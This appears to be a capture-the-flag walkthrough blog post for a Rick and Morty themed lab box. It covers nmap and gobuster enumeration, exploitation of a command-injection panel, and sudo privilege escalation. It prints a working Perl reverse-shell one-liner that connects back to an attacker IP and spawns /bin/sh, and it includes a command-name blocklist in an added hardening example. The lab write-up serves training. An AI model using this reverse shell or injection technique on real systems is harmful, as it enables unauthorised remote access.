A Rick and Morty CTF. Help turn Rick back into a human! Link to room is here
![](https://miro.medium.com/max/696/1*Lvo5T_2AnmYVzXfm6vacZg.jpeg)
This is a Rick and Morty themed challenge, and we play Morty. We have to exploit a web server to find the 3 ingredients that will help Rick make the potion that transforms him from a pickle back into a human. Let's use our hacking superpowers, hack the web server and save Rick.
Launch the box and let’s enumerate the IP given.
Use: nmap -sC -sV -A machine_ip
- nmap is the network mapper tool
- -sC -> default script scanning
- -sV -> version detection
- -A -> aggressive scan (OS detection, version detection, script scanning and traceroute)
![](http://blog.ehackify.com/media/2021/06/Screenshot_2-3.png)
We can see that ports 22 and 80 are open. Port 22 is SSH (secure shell) and port 80 is HTTP. Let's go to the browser, paste the IP there and check what is waiting for us.
![](http://blog.ehackify.com/media/2021/06/Screenshot_4-1-1024x470.png)
Let's spend some time enumerating this website. While that runs, let's view the page source.
![](http://blog.ehackify.com/media/2021/06/Screenshot_5-2-1024x437.png)
A username is found here. Let's do directory enumeration and check for other directories as well.
Use: gobuster dir -u machine_ip -w wordlist_path
- gobuster -> the tool
- dir -> directory enumeration mode
- -u -> target URL
- -w -> specify the wordlist path
![](http://blog.ehackify.com/media/2021/06/Screenshot_6-2.png)
The results show several directories. Let's open them one by one. (I forgot to take a screenshot.)
- /login.php
- /robots.txt
- /assests
![](http://blog.ehackify.com/media/2021/06/Screenshot_7-1.png)
![](http://blog.ehackify.com/media/2021/06/Screenshot_8-1.png)
Here I think we got a password. Let's try the password and the username we now have in hand.
![](http://blog.ehackify.com/media/2021/06/Screenshot_10-3.png)
I viewed the source code of the logged-in page and found something interesting.
![](http://blog.ehackify.com/media/2021/06/Screenshot_30.png)
I guess we have a base64-encoded password. Let's go to CyberChef to decode it.
![](http://blog.ehackify.com/media/2021/06/Screenshot_11-1.png)
I had to decode it almost 9 times to understand it was a rabbit hole, but that's OK. Keep moving forward, we need to save Rick.
Let's check the logged-in page.
Wait, that's strange! Why is it showing a command panel here? Let's execute some basic commands and see.
![](http://blog.ehackify.com/media/2021/06/Screenshot_12-1.png)
This page has a command execution vulnerability. Let's try some more commands.
![](http://blog.ehackify.com/media/2021/06/Screenshot_14-1.png)
![](http://blog.ehackify.com/media/2021/06/Screenshot_13-1.png)
It seems our commands are being filtered, which means some of them are rejected before the server ever executes them.
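As an added illustration (not code from the original writeup or from the room), here is a blocklist filter of the kind this command panel appears to use, next to the allowlist design that removes the injection entirely. The blocked words and the action names are constructed assumptions; the box's real filter is not shown on the page.

```python
import re
import subprocess

# Constructed blocklist: a panel like this one checks the user's raw text for a
# few "dangerous" command names and otherwise hands the whole string to a shell.
BLOCKED_WORDS = {"cat", "head", "more", "tail", "less", "nano", "vim"}

# Split on anything that is not a plain word/path character, so "ls;cat x"
# still yields the token "cat" even without spaces around the separator.
_TOKEN = re.compile(r"[A-Za-z0-9_./-]+")


def blocklist_allows(user_input: str) -> bool:
    """Return True if the blocklist would let this input reach the shell.

    Any command name that is simply not on the list (perl, python, base64, ...)
    passes straight through, which is why a blocklist is not a fix for
    command injection: it only blocks the commands its author thought of.
    """
    return not any(tok in BLOCKED_WORDS for tok in _TOKEN.findall(user_input))


# Hardened design: the browser sends an action name, never a command. The
# server maps that name to a fixed argv list and runs it without a shell, so
# there is nothing for ';', '|' or '$()' in the request to act on.
ALLOWED_ACTIONS = {
    "list-webroot": ["ls", "-la", "/var/www/html"],
    "disk-usage": ["df", "-h"],
}


def resolve_action(action: str) -> list:
    """Map an action name to its fixed argv; anything unknown is rejected."""
    argv = ALLOWED_ACTIONS.get(action)
    if argv is None:
        raise ValueError(f"unknown action: {action!r}")
    return list(argv)


def run_action(action: str) -> str:
    """Execute an allowed action with shell=False (a list argv is never parsed by /bin/sh)."""
    proc = subprocess.run(resolve_action(action), capture_output=True, text=True, check=False)
    return proc.stdout
```

The blocklist lets an interpreter invocation through untouched, while the allowlist rejects the whole string the moment it is not one of the two known action names.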
Got another idea: we shall take a reverse shell from here. I used a Perl reverse shell one-liner.
Use: perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Start a listener on the port you set.
![](http://blog.ehackify.com/media/2021/06/Screenshot_19-1.png)
Execute the command in the website and get the shell as shown below.
![](http://blog.ehackify.com/media/2021/06/Screenshot_21-1.png)
Now let's run some commands in the /var/www/html directory.
![](http://blog.ehackify.com/media/2021/06/Screenshot_24.png)
Now let's move around the server and find the other two secret ingredients. Let's go to the /home directory and search.
![](http://blog.ehackify.com/media/2021/06/Screenshot_25-1.png)
We are one step away from saving Rick.
Use: sudo -l
![](http://blog.ehackify.com/media/2021/06/Screenshot_26.png)
We found something very interesting: we can run any command with sudo without a password.
Time for privilege escalation.
use: sudo su
![](http://blog.ehackify.com/media/2021/06/Screenshot_27.png)
We finally saved Rick.
Summary
- Basic enumeration done: ports 22 and 80 open.
- We did directory enumeration on the website.
- The website had a command execution vulnerability.
- We took a reverse shell using a Perl one-liner.
- We could switch user without a password.
- We did sudo su to switch user and captured the flags.
Thank you, peace out ✌️.